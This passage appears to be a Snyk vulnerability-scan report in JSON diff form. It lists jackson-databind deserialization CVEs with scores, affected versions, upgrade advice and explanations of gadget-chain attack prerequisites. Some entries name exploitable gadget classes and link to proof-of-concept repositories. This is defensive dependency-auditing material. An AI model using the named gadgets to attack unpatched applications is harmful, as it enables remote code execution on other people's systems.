"CWE-502" - ], - "GHSA": [ - "GHSA-gjmw-vf9h-g25v" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-13T07:40:03.046000Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-12T21:52:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-13T07:41:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.918541Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "UltramanGaia" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2526", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 
8.1, - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:49.242419Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", - "epssDetails": { - "percentile": "0.79103", - "probability": "0.00622", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-20330" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-01-03T10:26:22.562970Z", - "functions_new": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-01-03T05:14:08Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-01-03T05:14:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.922905Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2620", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/jas502n/jackson-CVE-2020-8840", - "title": "Jackson PoC" - }, - { - "url": "https://github.com/jas502n/CVE-2020-8840", - "title": "PoC" - }, - { - "url": "https://github.com/Veraxy01/CVE-2020-8840", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:13.011056Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", - "epssDetails": { - "percentile": "0.91001", - "probability": "0.03042", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-8840" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-02-11T07:57:04.144993Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-02-09T21:12:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-02-11T21:12:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:13.031834Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2634", - "title": "Github Issue #1" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2631", - "title": "GitHub Issue #2" - }, - { - "url": 
"https://github.com/fairyming/CVE-2020-9548", - "title": "GitHub PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.016713Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", - "epssDetails": { - "percentile": "0.79604", - "probability": "0.00652", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9546", - "CVE-2020-9547", - "CVE-2020-9548" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5p34-5m6p-p58g", - "GHSA-p43x-xfjf-5jhr", - "GHSA-q93h-jc49-78gg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-02T10:29:31.222015Z", - "functions_new": [ - 
{ - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T05:18:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T05:18:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.132894Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Pedro Sampaio" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.3", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - 
"malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2462", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2469", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", - "title": "RedHat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.772859Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", - "epssDetails": { - "percentile": "0.73523", - "probability": "0.00392", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14892", - "CVE-2019-14893" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - 
